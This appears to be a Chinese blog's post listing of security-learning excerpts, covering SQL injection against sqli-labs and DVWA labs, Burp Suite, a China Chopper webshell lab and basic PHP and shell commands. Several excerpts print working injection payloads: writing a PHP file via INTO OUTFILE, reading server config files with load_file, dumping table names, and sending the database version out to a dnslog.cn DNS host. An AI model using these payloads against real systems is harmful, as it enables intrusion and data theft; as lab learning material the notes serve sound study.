- 博客(17)
- 收藏
- 关注
RSS订阅原创 sql注入 - 堆叠注入
5、堆叠(多语句)注入http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;--在php连接mysql注入中用到了musqli_multi_query...
2020-02-10 22:59:57
331
原创 sql 注入 - 二次注入
4、二次注入:注册一个admin’-- -的账户其实就是相当于admin这个账户,然后把后面的语句都给注销了,包括密码什么的。登录admin'-- -这个账户就相当于登录了admin这个账户,在admin'-- -这个账户里修改 密码,就是相当于修改了admin这个账户的密码...
2020-02-10 22:59:00
179
原创 sql 注入 - 带外攻击
带外攻击:http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt")) -- -带外攻击用到了load_file这个函数,利用load_file这个函数读取网络文件,其中访问的 记录会被记录下来,其中就用到了dnslog.cn...
2020-02-10 22:57:51
1196
原创 sql注入 - 读写文件
读文件:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file("D:\\phpStudy\\PHPTutorial\\Apache\\conf\\httpd.conf")-- -在显示位上显示apachectl的配置文件的信息这就是load_file()函数的用法2.写文件http...
2020-02-10 22:55:54
339
原创 sql注入练习
DVWA训练基础 low级别1.参照上文确定当前库1' union select (select database()),2 -- -2.确定库后,爆表1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),...
2020-01-07 00:59:37
251
原创 火狐浏览器安全常用插件简介
Wappalyzer,可查看浏览网页服务器的基本信息Flagfox,可查看当前网页的ip地址与服务器位置User-Agent Switcher,可改变浏览器内核信息,伪装为谷歌,搜狐等X-Forwarded-For Header,可更改代理IPMax HacKBar,按F12查看网页源代码Web Developer,Web开发调试插件Wappalyzer,可查看浏览网...
2020-01-02 22:48:56
375
原创 BurpUnlimited常用模块简介
Proxy模块可抓住网页流通的数据包Repeater模块,可将抓住的数据包发送到此模块,进行修改反复认证,无需反复抓包。Intruder模块,可以暴力破解一些简单的密码与文件目录如下图,将抓取的数据包的密码选取设为变量,然后点击PayloadsSpider爬虫模块,可以将浏览的网站信息统统抓到,很方便的模块在target模块界面将抓到的数据包发送到爬虫模块,进行搜集...
2020-01-02 22:10:55
336
原创 中国菜刀模拟攻击实验
1.首先两台机器要ping通,关闭防火墙2.设置iis服务器菜刀攻击1.创建一个文本文件后缀为asp.选择move方式进行改后缀去虚拟机里查看运行菜刀工具进行模拟攻击,首先添加shell添加完之后打开就可以查看虚拟机里的文件...
2019-12-30 22:08:21
743
原创 数组的操作技巧
1.获取数组的长度,count()和 sizeof()统计数组下标的个数2.each() 返回当前元素的键名和键值,并将内部指针向前移动3.list() 用于在一次操作中给一组变量赋值4.数组元素的排序: sort()、asort()和 ksort()都是正向排序,rsort()、arsort()和 krsort()是反向排序...
2019-12-11 20:47:12
99
原创 字符串函数 总结 含义及运行结果
strlen() mb_strlen() 都可以用来计算字符串长度,区别在于mb_strlen可以计算中文字addslashes() 将预定义的字符添加反斜杠转义bin2hex()将ascii字符串转换为16进制chop()移除字符串右侧的空白字符或者其他字符,这些字符需要自己指定的,默认就是空白字符chr()将指定的ascii值转...
2019-12-10 23:11:29
221
原创 根据页面的行数,生成一个不同颜色的页面
根据页面的行数,生成一个不同颜色的页面,0-30红色背景,31-60蓝色背景,61-90绿色背景,91-120黑色背景,121-150紫色背景,超过为白色。注意,颜色可以自己随便选择。<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>...
2019-12-10 00:45:30
107
原创 PHP来编写一个页面,页面内容显示出浏览器的信息
1.使用PHP来编写一个页面,页面内容显示出浏览器的信息。包括浏览器信息,系统信息,文件位置信息,PHP版本,文件行数。注意:浏览器信息使用$_SERVER['HTTP_USER_AGENT']这个超全局常量,同时要保证页面的美观。(使用for循环生成一个表格。)常用的系统常量:__FILE__:php程序文件名/绝对路径__DIR__: 被调用的文件脚本所在的目录...
2019-12-10 00:43:10
212
原创 完成apache服务器能够使用php解析.phtml .php3
第一步:先修改配置文件httpd.conf 添加.phtml第二步:创建.phtml文件 .php3文件第三步:验证.phtml文件 .php3文件
2019-12-09 20:45:45
239
原创 使用php输出 that's ok
两种方法:1.使用双引号中插入单引号2.使用单引号,但是加上转义字符\3.使用eof输出$a='that\'s ok';echo $a;echo <<<Eofthat's okEof;...
2019-12-09 20:04:10
109
原创 设置php能够连接mongodb(扩展,sqlserver)
第一步:先用浏览器下载一个mongodb(http://pecl.php.net/package/mongodb)(与自己的phpstudy版本要一样)第二步:把它复制到phpStudy\PHPTutorial\php\php-5.6.27-nts\ext(自己安装的路径)第三步:修改配置文件php.ini 给它添加一个php mongodb.dll...
2019-12-09 19:47:54
107
原创 windows基础命令
cmd 操作的基础命令cd:切换目录cd 可以显示当前那你所在的目录cd.. 可以让你返回上一层的文件夹cd /d e: 进入上次在e盘的路径。cd /d e:\ 直接进入盘符的根目录文件(e可以是任意盘符)cd e: 显示上次e盘所在的路径 cd /d d:\src 进入d:\src目录cd dji\dsa...
2019-12-02 17:39:47
176
原创 linux基础命令
基础目录/sbin 管理员用的文件夹/etc 配置文件存放目录/usr GUN社区软件的存放目录/dev 设备文件存放目录/home普通用户目录存放目录/mnt 临时挂载文件夹颜色说明黑色:普通文件夹红色:压缩文件绿色:可执行文件蓝色:目录黑底黄字:设备文件tab键:在系统中的补齐,可以补齐命令字,已存在的目录和文件Ctrl+l :清屏 Ctrl+c:终止Ctr...
2019-12-02 17:37:08
180
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人